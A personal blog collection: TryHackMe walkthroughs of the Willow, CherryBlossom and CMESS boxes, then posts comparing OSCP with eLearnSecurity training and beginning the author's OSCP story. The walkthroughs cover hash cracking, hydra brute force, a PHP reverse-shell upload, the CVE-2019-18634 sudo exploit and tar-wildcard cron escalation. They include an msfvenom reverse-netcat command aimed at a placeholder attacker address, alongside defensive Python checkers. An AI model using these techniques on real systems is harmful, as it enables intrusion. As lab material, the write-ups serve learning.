Here we’re going to go through another box called Willow, created by the amazing MuirlandOracle. Knowing this is one of his creations and having done his boxes in the past, we can expect some encryption challenges and constant bumps in the road haha. Let’s get into it.
L3ts G3t $h3ll
Initial nmap scans show the following ports open.
22 for SSH
80 for HTTP
111 for RPC bind
2049 for network file share (NFS)
So let’s take a look at HTTP and see what’s going on there.
For now it seems to be a huge string of random numbers, so let’s dig a little further into the other ports and see if we can find something that might give us a clue to what this is. Let’s take a look at the NFS (Network File Share).
showmount -e <ipaddress>
Looking at the network file share, it seems someone is sharing their /var/failsafe folder, exported to * (everyone). So let’s mount this and take a look.
Looks to be something to do with RSA key pairs, so maybe that gives us a clue to what’s on the web page.
Also note “Recovery Page” in the title here.
Let’s see if we can work out what this is and decrypt it.
Putting this through CyberChef and using the SSH parser module, we manage to decrypt this message and see a note about it being an SSH private key.
"Key type: Willow, here's your SSH Private key -- you know where the decryption key is!"
So I imagine where they’re saying “you know where the decryption key is”, it will be the things we found on the NFS that help us. Let’s now use an RSA calculator to work out and decrypt the encrypted message.
It should also be noted that MuirlandOracle has given a great explanation of RSA key generation, and down at the bottom in the example scripts we can see that the E, N and D values are spat out. We have these values from the NFS.
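To make the role of those three values concrete, here is an added example (not MuirlandOracle’s script and not code from the box) of textbook RSA: how d is derived from e and the two primes, and why the public side only needs e and n while decryption needs d. The primes, exponent and message below are constructed toy values, not the numbers from the NFS share.

```python
# Added example (not MuirlandOracle's script): textbook RSA with the e, n and d
# values the walkthrough refers to. The primes and message here are constructed
# toy values; a real key uses primes hundreds of digits long and padding.
from math import gcd


def rsa_keygen(p: int, q: int, e: int = 65537) -> dict:
    """Derive the public modulus n and private exponent d from two primes."""
    n = p * q
    phi = (p - 1) * (q - 1)            # Euler's totient of n
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime with phi(n)")
    d = pow(e, -1, phi)                # modular inverse of e, Python 3.8+
    return {"n": n, "e": e, "d": d}


def rsa_encrypt(m: int, e: int, n: int) -> int:
    """Public operation: c = m^e mod n. The block must be smaller than n."""
    if not 0 <= m < n:
        raise ValueError("message block must satisfy 0 <= m < n")
    return pow(m, e, n)


def rsa_decrypt(c: int, d: int, n: int) -> int:
    """Private operation: m = c^d mod n. Only the holder of d can do this."""
    return pow(c, d, n)


def encrypt_bytes(data: bytes, e: int, n: int) -> list:
    """Encrypt one byte per block (fine for a toy n; real RSA pads whole messages)."""
    return [rsa_encrypt(b, e, n) for b in data]


def decrypt_blocks(blocks: list, d: int, n: int) -> bytes:
    """Decrypt a list of integer blocks back into the original bytes."""
    return bytes(rsa_decrypt(c, d, n) for c in blocks)


def demo() -> dict:
    # Constructed toy parameters: p=61, q=53, e=17 gives n=3233 and d=2753.
    key = rsa_keygen(61, 53, e=17)
    blocks = encrypt_bytes(b"hi", key["e"], key["n"])
    recovered = decrypt_blocks(blocks, key["d"], key["n"])
    return {"key": key, "blocks": blocks, "recovered": recovered}


if __name__ == "__main__":
    print(demo())
```

The point to take from it is that anyone holding e and n can produce the "huge string of numbers", but turning it back into the key text needs d, which is exactly why d was sitting on the NFS share.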
Retrieved Private SSH Key
Great, let’s see if we can save this and use it now!
Of course it’s never that fucking easy! However, we can use our good old friend JohnTheRipper to convert this key into a hash value and see if we can crack it!
Cracking time, again with john and the rockyou wordlist.
Great, we have the password, so now let’s try to SSH to the box again and see if we get in!
WE’RE IN!
Let’s grab that user flag now that we have our SSH shell on the box as the willow user.
RIGHT! Of course there’s always that extra step. Right, let’s base64 this picture, transfer the output to my box and decode it.
cat user.jpg | base64
Now take all that output from the above command and put it inside a file. I put it inside one I created called “user.b64”, then cat’d and decoded that file and output it into user.jpg.
cat user.b64 | base64 -d > user.jpg
We got user flag
Awesome, we have our user flag!
L3t5 G3t r00t
Okay, let’s take a look around and see what we’ve got to work with to get root.
Above we did the same procedure, but this time to get the LinEnum script over to the box. Let’s run the LinEnum script now and sift through the results.
Hmm okay, let’s make a note that we can run the /bin/mount command as root with no password; this might give us a hint as to where we need to look.
If we look in the /dev directory, this is normally where devices or filesystems show up, and then we would need to mount one into our directory tree somewhere.
a secret path
So with that, and knowing we can run the mount command as sudo, let’s try and mount this partition onto /mnt/creds.
Now let’s take a look inside the partition and see if we find anything useful.
OH YEAH CREDS!!!!
Amazing, we have the root and Willow users’ passwords. Let’s switch user to root and get that root flag.
Again another roadblock! Well, let’s now try and work this out. We have the root password and the willow password, but what does “I gave you the root flag some time ago” mean? hmmm…
OF COURSE!!!!
I bet that little sneaky bastard has hidden something in the user.jpg! Okay, let’s see if we can extract it using steghide.
sneaky sneaky sneaky! root flag!
ROOOOOOOOT!!
Thanks again MuirlandOracle for another interesting, and infuriating, box haha. Hope you all learnt something from this box.
This is my walkthrough on how I did the CherryBlossom box on tryhackme.com. It was an amazing box and fair play to the creator for this one, a very smart guy known only as MuirlandOracle.
This box consists of multiple layers of steganography which eventually lead you to a journal/diary, from which you find information that leads you to a shell on the box, then lateral movement to another user and finally rooting the box. It was painstaking work and not for the fainthearted. Enjoy the read.
Warning: most filenames have been either changed in the screenshots or blurred, to encourage you to go find these things yourself.
L3t’s G3t A $h3ll
First things first, we need to do an nmap scan of the box.
Nmap shows us that we have ports 22 (SSH), 139 and 445 (Samba) open, so let’s start enumerating the Samba services using enum4linux.
enum4linux -a <ipaddress>
Cool, we found an open share. Now let’s flick over to another tool for further enumeration on SMB called smbmap; this will try to list shares and their contents if readable.
smbmap -H <ipaddress>
Great, within that share we found a .txt file, so let’s use smbmap to download it.
Okay, so let’s take a look into this file, see what it is and see if we have anything juicy within.
By the looks of it, it just seems to be base64, so let’s decode it and see what we get from it.
cat <file> | base64 -d > decoded.b64
Now we have something that looks like a PNG file, so let’s take a look.
Hmmm, just a picture of cherry blossom, so let’s do a little more digging into the picture and see what’s going on. For this I’m going to start using a toolkit called stego-toolkit, and it can be found here.
Not going to give a full walkthrough on how this tool works as there are quite a few online, but you can run either check_png.sh <filename> or check_jpg.sh <filename> and it will run a series of checks against your file. Here I used check_png.sh decoded.b64.
The thing that raised my suspicions about this picture having something to hide was that the file was 2.5MB large and another tool called zsteg kept finding “Secret” stuff within. Don’t believe everything you see from one tool; make sure to use 2 or 3 different ones.
zsteg output
Let’s try and use another tool within this toolkit to extract anything from the picture; here we use stegpy <filename>.
Great, so we have extracted a zip file, so let’s take a look at this now (name of file was changed).
Hmm, that’s odd, this zip is telling us it’s another picture. Let’s try and unzip it.
This time we get an error about the file’s header signature, so let’s take a closer look at the hex and see what’s going on. For this I used an awesome online tool called HexEd.it – great little tool.
Okay, we have a .ctz (CherryTree filename) within a zip file that is using JPEG magic byte numbers. This sounds confusing, and it is, but basically magic byte numbers, OR file signatures, are a unique set of numbers that identifies what type of file something is. For a list of signature numbers go here – File Signatures.
JPEG’s signature is “FF D8 FF D8”
Let’s change these JPEG signatures to be that of a ZIP file; I’ll let you hunt out the signatures for that.
Should look like a ZIP now.
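The same signature check can be done in code rather than by eye in a hex editor. The following is an added example, not part of the original walkthrough and not a tool from stego-toolkit: it identifies a file by its leading bytes, flags a file whose extension disagrees with its real signature (the situation with the zip wearing a JPEG header), and rewrites the header the way the hex-editor step above does. The signature table holds the well-known public values (a JPEG begins FF D8 FF); the extension map and the sample buffer are constructed, and treating .ctz as a 7-zip container is taken from this walkthrough.

```python
# Added example (not from the box or its author): identify a file by its magic
# bytes, flag a name/signature mismatch, and restore a tampered header.
# Signatures are the well-known public values; sample buffers are constructed.
SIGNATURES = {
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif":  (b"GIF87a", b"GIF89a"),
    "zip":  (b"PK\x03\x04", b"PK\x05\x06", b"PK\x07\x08"),
    "7z":   (b"7z\xbc\xaf\x27\x1c",),
    "pdf":  (b"%PDF-",),
    "elf":  (b"\x7fELF",),
}

# Which signature family an extension should carry. Mapping .ctz to 7z is an
# assumption taken from the walkthrough (CherryTree password-protected files).
EXTENSION_KIND = {
    "png": "png", "jpg": "jpeg", "jpeg": "jpeg", "gif": "gif",
    "zip": "zip", "7z": "7z", "ctz": "7z", "pdf": "pdf",
}


def identify(data: bytes):
    """Return the signature family matching the file's leading bytes, or None."""
    for kind, prefixes in SIGNATURES.items():
        if any(data.startswith(p) for p in prefixes):
            return kind
    return None


def check_extension(filename: str, data: bytes) -> dict:
    """Compare what the filename claims with what the bytes say."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claimed = EXTENSION_KIND.get(ext)
    detected = identify(data)
    return {
        "claimed": claimed,
        "detected": detected,
        # Only report a mismatch when we know what the extension should look like.
        "mismatch": claimed is not None and detected != claimed,
    }


def patch_signature(data: bytes, kind: str) -> bytes:
    """Overwrite the leading bytes with the canonical signature for `kind`
    (the manual hex-editor fix from the walkthrough, done in code)."""
    sig = SIGNATURES[kind][0]
    return sig + data[len(sig):]


if __name__ == "__main__":
    # Constructed sample: a zip header whose first four bytes were swapped for
    # JPEG-looking bytes, so `file`-style checks call it a picture.
    disguised = b"\xff\xd8\xff\xd8" + b"\x14\x00\x00\x00" + b"\x00" * 24
    print(check_extension("mystery.zip", disguised))   # mismatch: True
    print(identify(patch_signature(disguised, "zip")))  # zip
```

Note the limit of this kind of check: a file named picture.jpg carrying that header passes the extension test, which is exactly why the walkthrough needed the unzip error, not the signature alone, to notice something was wrong.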
Now let’s export this and try and unzip it again and see if it works.
Okay great, we get asked for a password to extract this new mystery .ctz file.
Let’s use another tool in stego-toolkit called fcrackzip, a password attacker for ZIP files, and see if we can get a password for our zipped file.
Amazing, we have a password, so now let’s unzip this password protected file and see what comes out.
Great, we have ourselves a .ctz file, which is a CherryTree file that has been zipped and password protected (I renamed the file to diary.ctz).
So with it being a 7-zip file we can use JTR (JohnTheRipper) to convert this for us into a hash for a bit of a hash cracking session, like we haven’t done enough at this stage!
That’s a little small to see, but I’m running 7z2john against our diary.ctz and it’s throwing us an error saying we’re missing a module. Let’s see if we can find this module and install it. *Skipping 15 mins of searching here for module*.
Okay great, so running that again with our new module installed, we get a great big dirty SHA256 hash that we will store in a file called “hash” (original, I know). Time to crack the hash; we are going to use john for this and the rockyou.txt wordlist.
Password retrieved, let’s see if we can now open this password protected CherryTree file using CherryTree.
Cool, so we have a diary with a few entries. I won’t spoil anything here for anyone, but I’ll let you read through it. In one of the entries we find the journal flag.
FIRST FLAG!
The important part here is that we get a few potential usernames, including the person’s girlfriend. He later talks in his diary about how he’s got a list of unique passwords he created, and how he has chosen one and his girlfriend has chosen one, so that’s 2 passwords from the list that are now used. Password lists were in the diary as well as in an attached file. I won’t tell you which one I used.
With that information, let’s see if we can hydra our way into his girlfriend’s account, as we see her username, and we don’t know the other person’s name yet as they refer to themselves with their initial. We see this by looking at the diary entries.
Hydra is a great tool for bruteforcing a range of logins and more! Here we are using it with the girlfriend as the username, a password list, -V for verbosity to see every login attempt, -f to stop the attack upon the first successful login, and -e ns to try the username and a blank password as a password.
SUCCESS!!!
Let’s try and SSH in and see what we get.
Great, we have our initial shell on the target machine, BUT not user, as no user flag yet. More digging…
L4ter4l M0v3MenT
Now our next step is going to be a lateral move across to the boyfriend, who is the owner of the diary and a user on the box.
Let’s upload our favourite tool Linpeas using another tool I have grown to love and which has replaced the good old “python SimpleHTTPServer” module, called updog. Kick that off and see what we find. updog is amazing! I highly suggest going and checking it out!
With that running, we can now do a wget of our linpeas script from the SSH shell we have.
getting linpeas, easy as that.
After some very deep looking we find an interesting file in our linpeas results.
Let’s go take a look at that and see what we find.
Great, we found some hashes including the boyfriend’s hash. Let’s see if we can crack one of them, as we already have the password to the other account, the girlfriend’s.
Using hashcat we can start cracking our hash using the following:
-m specifies the hash type we are cracking
-o is the outfile name to put the password in if cracked
-O is to optimize the cracking
If you find it taking a while to crack try to remember something from the diary.
Eventually the password cracks, and now we can try logging in via SSH as this user.
That failed. Maybe it’s because SSH login is not permitted for this user, so let’s go back to the girlfriend’s shell and try switching user.
su <username>
A simple “su <username>” seemed to work just fine, and we get the user flag.
L3t’s G3t R00t
Okay, now let’s copy the Linpeas script over to this user, run it as him and see if he has anything cool to find.
After some more digging we find we should try “sudo -l” and see what we can run as the root user. This is one of the first things you should try when you get access; it’s always nice to find easy wins.
That’s strange, we shouldn’t be getting the password echoed back to us. This is a feature called pwfeedback that’s enabled in the /etc/sudoers config; more about it here: CVE-2019-18634. Basically a stack buffer overflow in this version.
Git clone the file down, and then compile the code with gcc by running the following:
gcc exploit.c -o exploit
Updog this exploit now to the box and run it.
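From the defending side, the thing to look for is the option itself. The following is an added example, not part of this walkthrough and not the exploit above: it reads sudoers-style text and reports whether pwfeedback is left switched on, honouring the two rules that matter when reading Defaults lines (a later entry overrides an earlier one, and a leading "!" turns an option off). The sudoers text is a constructed sample, not the box’s real file; the remediation it prints is the one in the sudo advisory for CVE-2019-18634 (drop the option, or run sudo 1.8.31 or later). Backslash line continuations are not handled.

```python
# Added example (not part of the original walkthrough): audit sudoers content
# for the pwfeedback option that CVE-2019-18634 depends on. Sample text is
# constructed; it is not the box's /etc/sudoers.
import re

SAMPLE_SUDOERS = """\
# constructed sample, not a real /etc/sudoers
Defaults        env_reset
Defaults        mail_badpass, pwfeedback
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
"""


def _options(defaults_line: str):
    """Yield (name, enabled) pairs from the option list of one Defaults line."""
    # Drop the keyword and any scope suffix (Defaults:user, Defaults@host, Defaults>user).
    body = re.sub(r"^Defaults\S*\s*", "", defaults_line)
    for raw in re.split(r",\s*", body):
        raw = raw.strip()
        if not raw:
            continue
        name = raw.split("=", 1)[0].lstrip("!")   # "secure_path=..." -> "secure_path"
        yield name, not raw.startswith("!")        # "!pwfeedback" -> disabled


def pwfeedback_enabled(sudoers_text: str) -> bool:
    """True if the last relevant Defaults entry leaves pwfeedback switched on."""
    enabled = False                                # sudo's upstream default is off
    for line in sudoers_text.splitlines():
        line = line.split("#", 1)[0].strip()       # strip comments
        if not line.startswith("Defaults"):
            continue
        for name, on in _options(line):
            if name == "pwfeedback":
                enabled = on                       # later lines win
    return enabled


def audit(sudoers_text: str) -> str:
    """One-line finding suitable for a hardening report."""
    if pwfeedback_enabled(sudoers_text):
        return ("pwfeedback is enabled: remove it (Defaults !pwfeedback) "
                "or upgrade sudo to 1.8.31 or later")
    return "pwfeedback is not enabled"


if __name__ == "__main__":
    print(audit(SAMPLE_SUDOERS))
```

On a real host the text would come from `sudo -l`-visible behaviour or the files under /etc/sudoers and /etc/sudoers.d, read with appropriate privileges; the echoed asterisks the walkthrough noticed at the password prompt are the same setting seen from the user's side.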
!!!ROOT!!!
Hope you enjoyed it as much as I did, very frustrating but fun and rewarding and learnt loads! thanks again MuirlandOracle for the box it was truly a great experience!
This is going to be a simple walkthrough on how I did the CMESS box on TryHackMe.com. The privilege escalation demonstrates a really good use of wildcard exploitation. The creator of the box is Optional, and thank you to him for creating an awesome, fun box.
Let’s g3t 4 Sh3ll
First things first we’re told to add the hostname to our /etc/hosts file.
So kicking off the box with an nmap scan, we see only ports 80 and 22 open.
Heading over to port 80 we see a simple and pretty empty home page.
Running gobuster on the site gives us quite a few entries back.
As well as directories, we should always enumerate for any subdomains; for that I used a tool called wfuzz.
Here we see that we got a subdomain back, so add this entry into the hosts file also, so we can browse to it.
Upon going to our newfound subdomain we see a conversation between the user, andre, and support. These are both email addresses or possible usernames we could use in the future, so make note of these.
We also see that the support user has reset andre’s password, so let’s take that and see if we can use it anywhere. Looking back at our gobuster output we can see we have a /admin directory. Let’s take a look.
We find a login page that takes an email and a password; these we have, so let’s try it.
And we get logged in. Straight away we see a “Gila CMS version”, so let’s take a look if there are any exploits for it.
Searchsploit shows that there is an LFI, or Local File Inclusion, for this version, so let’s take a look using
searchsploit -x <exploit-path>
Let’s see if we can use the last bit of this URL in the CMS we have access to and see if it returns anything.
Append this to the end of our URL.
Okay great! We see we have some type of directory listing now with some upload functionality, so let’s see if we can upload a shell.
We manage to upload a payload which goes into the “assets” directory. Let’s start a listener and then browse to http://cmess.thm/assets/php-reverse-shell.php to get the server to process the payload.
Awesome, we have a shell as www-data. Looking around we see we can’t get into the andre directory, so our next step is lateral movement to andre.
Lat3ral m0ve to Andre u5er…
Let’s head over to the /tmp directory, grab linenum.sh and see what we can do as the www-data user, and maybe see if we can find anything interesting.
Grabbing the linenum.sh file: “python3 -m http.server” serves the request for “le.sh” (linenum.sh).
Kicking this off with “./le.sh -t”. The “-t” is for thorough testing. We then see in the results some interesting files lurking about.
This looks interesting so lets take a look.
Awesome, we found a password!! Let’s see if we can now SSH to the box as andre.
Awesome, let’s grab user.txt while we’re here.
L3ts g3t R00T!
Nice, we got user!! Let’s repeat the linenum process and see if we can do anything else new. However, this time I’m going to use an “upgraded” version of LinEnum called LinPeas. This does the same thing as linenum and some more…
Linpeas has a wicked awesome colour scheme for quickly hunting out privilege escalation points! So let’s begin the hunt.
Looking into our results from linpeas, we see that it’s flagged a cronjob that runs as root every 2 mins.
This job is running a tar command to back up the andre user’s “backup” directory and everything in it.
We need to create 2 directories and a shell.sh file inside the /home/andre/backup directory that tar will see, interpret as command-line options and execute. SUCKAA!
msfvenom -p cmd/unix/reverse_netcat lhost=ATTACKER-IPADDRESS lport=ATTACKER-PORT R
Msfvenom to create a payload
Start our listener for this payload
Heading over to the directory that’s going to be backed up by tar, we see a little note.
Let’s now echo our payload into “shell.sh” and create the 2 directories needed for this exploit.
Now we wait for the cron job to run, and we should get tar to interpret those commands and execute our shell.sh file.
Run “date” to see the system’s time.
Woop Woop we got our shell back from the box!
This was a great box and really demonstrated the issues behind using wildcards in automated jobs or scripts, and how a hacker can leverage these vulnerabilities to gain higher privileges.
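Two checks a sysadmin could run to catch this class of problem before a cron job bites, as an added example that is not the box’s own cron job (the walkthrough never prints that line) and not code from the box’s author. The first scans crontab text for a tar command that receives a bare shell glob with no `--` before it, which is what lets filenames be read as options; the second lists entries in a directory whose names start with "-". The crontab lines, the /var/backups paths and the temporary directory contents are constructed; only /home/andre/backup comes from the walkthrough. The hardened forms shown (`-C <parent> <dir>` and `-- *`) stop GNU tar from treating operands as options.

```python
# Added example (not the box's cron job): defender checks for the tar wildcard
# problem described above. The crontab text and directory contents are constructed.
import os
import re
import shlex
import tempfile

SAMPLE_CRONTAB = """\
# constructed sample crontab (the first line is the risky pattern)
*/2 * * * * root cd /home/andre/backup && tar -zcf /var/backups/andre.tgz *
*/2 * * * * root tar -zcf /var/backups/safe.tgz -C /home/andre backup
0 3 * * *   root cd /srv/data && tar -zcf /var/backups/data.tgz -- *
"""


def _tar_has_unguarded_glob(argv: list) -> bool:
    """True if argv runs tar with a glob operand that no '--' protects."""
    names = [os.path.basename(a) for a in argv]
    if "tar" not in names:
        return False
    args = argv[names.index("tar") + 1:]           # only tar's own arguments
    for i, a in enumerate(args):
        if any(ch in a for ch in "*?[") and "--" not in args[:i]:
            return True                            # shell expands it into argv
    return False


def tar_wildcard_lines(crontab_text: str) -> list:
    """Return crontab lines whose tar command takes a bare, unguarded glob."""
    flagged = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        # Inspect each shell command in the line separately (cd ... && tar ...).
        for cmd in re.split(r"&&|\|\||;", line):
            try:
                argv = shlex.split(cmd)
            except ValueError:                     # unbalanced quotes: skip
                continue
            if _tar_has_unguarded_glob(argv):
                flagged.append(line)
                break
    return flagged


def option_like_entries(directory: str) -> list:
    """Names in `directory` that a shell glob would turn into tar options."""
    return sorted(n for n in os.listdir(directory) if n.startswith("-"))


def demo() -> dict:
    # Constructed directory: one normal file and two option-shaped names.
    with tempfile.TemporaryDirectory() as d:
        for name in ("notes.txt", "--constructed-option=1", "-v"):
            open(os.path.join(d, name), "w").close()
        suspicious = option_like_entries(d)
    return {"cron": tar_wildcard_lines(SAMPLE_CRONTAB), "entries": suspicious}


if __name__ == "__main__":
    print(demo())
```

The directory check is the one to schedule alongside the backup itself: a user-writable directory that a root cron job globs over is the precondition, and an entry whose name begins with "-" is the signal that someone has started to use it.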
I have seen a lot of conversation about the difference between these two providers of penetration testing courses or hacking courses. So below I’m going to give you my rundown of the 2. Also I’m stating now that I ain’t the best at spelling and grammar, so don’t be a fuck-tard and start correcting my shit, just read and get on with it!
Now I just want to let you know I have my OSCP certificate and my eJPT (Junior Penetration Tester) certificate, and have bought but not completed the ELearnSecurity PTP course. So from here on I speak about my opinions, which are my own, and my experience with both of these.
So if you’re new to the Cyber Security world and you wanna become a fu*king hacker baby! then you would definitely have googled “how to become a hacker”, “how do I start in penetration testing” or “does my cat secretly watch me while I sleep”. Okay, maybe not that last one, but yeah the other two. I know I did when I first started, and right now you’ll get lots of different results, and that’s how you might have even ended up here. Eventually you’ll work out that you need to get OSCP and maybe some other certificates or qualifications, but you tend to always read “OSCP is a must to get a job in Cyber security”. Then you realize that OSCP is a bit f*cking mental and probably for the 1337 wannabe hackers, so you start looking around for courses in penetration testing and hacking and you’ll find this company called ELearnSecurity, which delivers complete beginner courses in penetration testing. So let’s go into that and talk about the differences between ELearnSecurity’s PTS (Penetration Testing Student) course and OSCP.
ELearnSecurity
So ELearnSecurity is, first of all, amazing; it really is. Head over to their website and check out the courses they provide. When I did this, exactly 2 years ago today, I found myself really interested in the PTS course (Penetration Testing Student), which was their course for people with NO EXPERIENCE AT ALL!!! So I bought it and got started!
Looking at the syllabus I felt pretty confident I could jump into this and invest a few hours a day learning their PowerPoint style material, with the videos at the end of each section drilling in everything you learnt in utter detail!
PTS Syllabus
The course takes you through a very structured way of learning. It teaches you all the basics you need to know, like NMAP scans and the different flags to use, what XSS scripts and SQL injections are and how they work, how to exploit SMB and many more. Each section generally teaches you a subject and then finishes with a video or 2 about it, where the instructor shows you step by step what you just learned in the slides. This method of teaching is really good and really drove home certain points you need to remember. Then once you have learnt that section, let’s say on NMAP, it gets you to start the “NMAP Lab”, where you open the challenges for that lab and it will ask you something like “What ports are open on the 3 computers in the network”, and then you put to the test everything you learned from that NMAP section. Below is a list of labs from PTSv3! I think they’re on V5 now but as far as I’m aware not too much has changed, just some more stuff added; when you buy the course you will get the latest and greatest version.
PTSv3 Labs
Their sh*t is structured, nice and just damn right sexy. It will take you from an absolute n00bian and give you those foundations you will need to start enumerating shit and hacking things. It gives you enough experience that once completed you can start jumping on the active boxes in HTB or smash your way through the labs/VMs in Vulnhub.
EXAM TIME. Once you have finished all the course material and the videos, and then completed all the labs (do them twice over), you will have to do your exam, the eJPT exam, to test your new powers! Now the exam is good fun; here you will be presented with a domain network style pentest and have to hack your way through like 10 computers and 3 servers to answer questions that get given to you at the beginning. If I remember rightly there are about 20 questions, ranging over things you will find in this domain network testy environment exam thingy, and you have 3 days to complete this exam! Now honestly it took me around 8 hours to do the whole thing, and I was a NOOB! That’s not to say it’s easy though!…
Once completed, and you submit your answers and you feel you have done and got everything you need, you will hit that big fuc*ing submit button and wait; after a while the page will load up and it will tell you if you have passed or failed. Honestly it’s a beginner course and it will deffo teach you everything you need to know in order to pass and get your feet wet in the real world!
ELearnSecurity Recap:
Online course available 24/7.
Powerpoint type presentations.
Multiple Videos for each sections.
Individual labs for end of every section.
3 Day Question based exam on domain network (more than enough time).
OSCP
Right, where do I start with OSCP? There are a lot of reviews and blogs out there for this one, so I will go over my findings of the course. OSCP is Offensive Security Certified Professional; it’s considered the 31337 course and exam to prove to oneself that you’re a hacker/penetration tester. In order to become OSCP certified you will need to do their PWK course and pass the exam; details on that are here.
So I started my OSCP journey back in August 2018 and passed in February 2019. I’m not going to bore you with the details as the actual journey and write-up can be found here. I will however tell you how it’s structured!
When you buy OSCP you will start it on the 2nd Sunday from the day you bought the course, I’m sure that’s how it works. On day one you will get an email with all the course material and connection packages (VPN files) to get started.
Now when you have downloaded all this you will have a folder called “oscp-pwk” or something along those lines, and inside there is your ~350 page PDF manual and all the training videos. You open up the video training and it will look like the below.
OSCP Videos
You will be shown everything from netcat listeners to reverse shells, from exploiting SQL injections to privilege escalation and gaining root. Once you’ve gone through all the PDF and videos that they provide, which took me about a week, you will then VPN to the labs. Once in, you’re faced with a big domain network and left to do what you want; you’re free to go explore and hack your way through their network as long as you follow a couple of rules and respect others that might be using or have used a box. I advise giving a box a reset before you jump on it! Below is a map of their network; you will start in the “Student Labs, Public Network” and hack your way through and pivot your way to other networks, with the goal being the admin department!
Now Offensive Security, throughout their training, will give you JUST enough information to get you started on boxes and then leave you to find the answers for yourself! For example, they will show you what things to look for when hacking a web app on a server, but it will be up to you to find out how to hack the stuff on the website, like the e-commerce shop on there, or how to hack the actual web server the web app sits on.
With OSCP you will find yourself in Google a lot, searching up exploits for certain versions of things or finding out how to privilege escalate a Windows/Linux computer. You will also find yourself in Exploit-DB a lot, which is basically, in short, a library of exploits for all sorts of things! And sometimes you will have to make changes to those exploits!
The exam is basically 5 computers separate from each other, and all have their own unique ways of being pwned; you have to pwn it and get a shell and then root/admin it to get full points for it. Each of the 5 boxes is point based and you have to get 70 POINTS OUT OF 100 WITHIN 24 HOURS TO WIN! Below is a quick look at what boxes are worth, points wise.
25 point box ( Buffer Over Flow )
25 point box
20 point box
20 point box
10 point box
Therefore it’s up to you how you tackle this and get your points! BUT that’s not the end! Once you’ve got all your points you will then need to WRITE A REPORT WITHIN 24HRS! And this is all back to back, so from the moment you start your exam you have basically 48 hours to hack sh*t up and get a report back to Offensive Security, then it takes a couple of days to get your results! You best make sure your report is shit hot, cause they can and will fail you for spelling or grammar mistakes!!! Sh*t, they will fail you for sending them the report unencrypted, but don’t worry, you will be told how to do this when the time comes!
OSCP Recap:
~350 page PDF Manual.
Offline Video led training.
24/7 access to domain network lab.
Offensive Security show only enough to get you started.
A lot you learn as you go through labs and research.
24hr Practical Exam.
24hr Report Writing.
Conclusion
If you’re starting your journey into Cyber Security and you wanna become a f*cking awesome hacker and you don’t know where to start, then head over to ELearnSecurity and do their PTS (Penetration Testing Student) course, then once completed jump on OSCP. Skip their PTP (Penetration Testing Professional) course as you won’t need it to pass OSCP! OSCP will teach you enough to pass their exam if you go into it knowing the foundations of hacking.
If you’re already hacking things and know your way around enumeration a bit and can comfortably exploit things and get shellz, then skip ELearn’s PTS and jump straight on to OSCP and start bashing away at that. OSCP will take you from foundation knowledge to advanced and get you hacking away even better than you were.
Remember that OSCP is also a beginner course; this is something a lot of people forget. They do provide some mega good training, but after that you’re left to do your own research and exploitation.
Any questions let me know… Hope you enjoyed!
And for those out there now doing your OSCP or eJPT exam, I say this to you!
A write-up on the path I took to gain my OSCP certificate, with a few tips that I hope will help you!
I also wanna quickly say a massive thanks to my partner and our kid, who have put up with me being in my office, sat at my computer, smashing OSCP for too long! Thanks for putting up with all my shit since day 1.
Before I get started I just wanted to say my writing skills can be god awful and it will probably contain spelling & grammar mistakes left, right and center, so either tell me or move on! I’m also from the UK, so for my Yankee friends out there, we do spell things a little differently.
***Warning: A lot of swearing and gif’s below***
The History
So looking back now, since I can remember I have always thought it would be so cool to be a “hacker”. You see it in movies, the people smashing away at the keyboard, sweat down their face, and then with a big finisher, BAM! They’re in! I wanted to be those people, and for those of you who think it’s still like that, it really isn’t lol.
Right, a little history on me as people always ask, and if you’re not interested scroll through. I’m currently in my mid 20’s, I have always loved technology and shit, never knew I would end up working in IT or Cyber Sec. I was a little shit at school and came out with a C in math and a C in IT and that’s it! I didn’t go to 6th Form, College or University; I always thought as a kid them places were for posh twats (you’re not posh twats, just educated ones) haha.
Where it began
So, one day back in mid 2015 I get a call from this fucking sales guy; he’s telling me I can become this 3L337 H4X0R (Elite Hacker) by taking one of their courses where you study from home and all this waffle, right. He was calling it “Certified Ethical Hacker”. He went on for a good 20 minutes telling me how I can do this course and come out ready to jump into hacking and earn big money. First time, I told him I wasn’t interested and maybe call me back when I had a job and could afford it. He calls me back a month later and I thought you know what, I’ll give it a go! After all, I always wanted to be a sweaty keyboard smashing hacker haha.
So, now I’m enrolled and the learning packages come in. There are different modules I had to study and then exams to take at the end when I felt ready; they also included all these labs with it. Courses that were included:
CompTIA A+
CompTIA Network+
CompTIA Security+
CEH
Me being jobless, I thought right, let’s crack into this, and started on them in the order above. I instantly fell in love even more with computers when I started this course.
Now, months go by and the only certificate I ever achieved was the CompTIA A+, which was enough for me to land my first job. The course ended up getting ignored, but I didn’t care; I now had my first job in IT Technical Support and thought I’d learn loads now from this, with the end goal to become a PENETRATION TESTER. Spent a few months there before I left because management was a bunch of stuck up twats. Then spent a few months bouncing around from job to job doing IT Support etc.
Now, it’s 2017 and I end up moving to the middle of the UK near Sheffield, and start this new job which I was with for a whole year. While there I gained my CompTIA Network+. So now I’ve been doing random IT jobs for the last 2 years and have gained my CompTIA A+ and my CompTIA Network+. Sweet, let’s start looking at IT security now!
Lets start moving to Cyber Security
After so much hunting around, I wanted to know how to start becoming a pen tester, and with that you start googling what the best course is to take. I found loads, and in the end I found ELearnSecurity; they teach people with no hacking skills the foundations and get them started in pentesting and taking on the world haha. So, in January 2018 I started the “full” edition of ELearnSecurity Pentesting Student v3 (PTSv3; I think the latest now is v5). I studied hard and smashed the labs hard and learnt SOOOOOO MUCH!! I highly recommend this to anyone wanting to start pen testing and not sure where to begin! Did this for a couple of months, completed the course, and took the exam in March 2018, which consisted of a 3 day practical exam where you hack your way through this environment, which was a series of computers and servers, and had to answer questions about things you obtained or found on the machines. Very challenging! I got a 92.5% pass, so I challenge you reading this to try and beat me!
With the ELearnSecurity Junior Penetration Tester (eJPT) certificate under my belt, I thought let’s start applying for junior pen test jobs, and eventually landed one near me. The interview went really well; I spoke a lot about tools and skills I learned from ELearnSec and they believed they could mould me into a fine tester. They took me on! Having been with these guys a while, it was time to start OSCP!!!
OSCP Time!
